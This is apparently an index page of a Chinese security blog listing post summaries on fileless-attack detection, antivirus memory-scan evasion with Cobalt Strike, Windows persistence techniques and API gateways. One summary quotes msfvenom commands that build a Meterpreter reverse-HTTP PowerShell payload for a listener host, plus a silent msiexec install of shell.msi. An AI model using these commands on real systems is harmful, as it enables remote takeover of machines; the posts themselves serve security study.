上一页 1 ··· 40 41 42 43 44 45 46 47 48 ··· 271 下一页
2022年5月11日
内存无文件攻击检测——Hunting In Memory,todo,待实践
摘要: Hunting In Memory 作者 Joe Desimone 分享 Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog cont 阅读全文
posted @ 2022-05-11 15:57 bonelee 阅读(235) 评论(0) 推荐(0) 编辑
使用Cobalt Strike和Gargoyle绕过杀软的内存扫描——todo,待实践,包括一些链接文章
摘要: 使用Cobalt Strike和Gargoyle绕过杀软的内存扫描 https://www.4hou.com/posts/lpkM 丝绸之路 勒索软件 2019-02-20 09:58:17 收藏 导语:本文将主要介绍我在Cobalt Strike的Beacon有效载荷和gargoyle内存扫描规避 阅读全文
posted @ 2022-05-11 14:45 bonelee 阅读(470) 评论(0) 推荐(0) 编辑
ESET 无文件攻击检测——内存扫描+AMSI,没有想到,做得也很强
摘要: https://help.eset.com/glossary/zh-CN/technology_network_attack_protection.html?technology_sbap.html 高级内存扫描程序 高级内存扫描程序与漏洞利用阻止程序结合使用以增强对恶意软件的防范,后者旨在通过迷惑 阅读全文
posted @ 2022-05-11 11:50 bonelee 阅读(964) 评论(0) 推荐(0) 编辑
2022年5月9日
一文讲解API网关核心功能——就是nginx,无非加入了安全、流控、转换、版本控制等功能
摘要: 一文讲解API网关核心功能 【编者的话】本文详细讲解了API网关的基础概念,使用场景和核心功能,以及基于API网关核心引擎做的API全生命周期管理功能扩展等,最好再介绍下当前主流的开源API网关引擎。 API网关概述 在微服务架构体系里面,我们一般会使用到微服务网关或叫API网关。 大家都比较清楚, 阅读全文
posted @ 2022-05-09 20:30 bonelee 阅读(1772) 评论(0) 推荐(0) 编辑
2022年5月6日
metasploit MSFVenom 生成powershell paylod todo 无文件攻击 msiexec /quiet /qn /i shell.msi
摘要: 写在前面,我自己的操作: kali下: msfvenom -p windows/x64/meterpreter_reverse_http -f psh -o m64.ps1 LHOST=192.168.0.112msfconsole里: msf6 > use exploit/multi/handle 阅读全文
posted @ 2022-05-06 20:59 bonelee 阅读(721) 评论(0) 推荐(0) 编辑
PSattack:一个渗透测试中使用的万能框架——还是有些过时啊,属于整合类工具,将其他好用的模块放到一起
摘要: PSattack:一个渗透测试中使用的万能框架 嘶吼RoarTalk 网络安全观察者 导语:这段时间以来,以powershell为载体,大牛们开发出了很多有趣的东西。比如Invoke-Phant0m日志清除器就在其中。这篇文章就是用来讲述一个将这些渗透测试脚本集合起来的框架:PSattack。 什么 阅读全文
posted @ 2022-05-06 16:52 bonelee 阅读(127) 评论(0) 推荐(0) 编辑
Window下常见的权限维持方式
摘要: Window下常见的权限维持方式 系统安全 Bypass007 2019-12-10 10,297 在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自 阅读全文
posted @ 2022-05-06 16:31 bonelee 阅读(67) 评论(0) 推荐(0) 编辑
Window权限维持(五):屏幕保护程序
摘要: Window权限维持(五):屏幕保护程序 Web安全 Bypass007 2019-12-04 10,068 屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所周知,Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件 阅读全文
posted @ 2022-05-06 16:30 bonelee 阅读(142) 评论(0) 推荐(0) 编辑
Window权限维持(一):注册表运行键
摘要: Window权限维持(一):注册表运行键 资讯 Bypass007 2019-11-11 6,056 译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 原文地址:https://pentestlab.blog/2019/10/01/persistence-registry-run- 阅读全文
posted @ 2022-05-06 16:28 bonelee 阅读(61) 评论(0) 推荐(0) 编辑
Window权限维持(三):新服务
摘要: Window权限维持(三):新服务 系统安全 Bypass007 2019-12-04 7,159 如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法,则这些服务可能导致权限提升。创建一个新的服务需要管理员级别的特权,它已经不是隐蔽的持久性技术。然而,在红队的行动中,针对那些在威胁 阅读全文
posted @ 2022-05-06 16:28 bonelee 阅读(31) 评论(0) 推荐(0) 编辑
上一页 1 ··· 40 41 42 43 44 45 46 47 48 ··· 271 下一页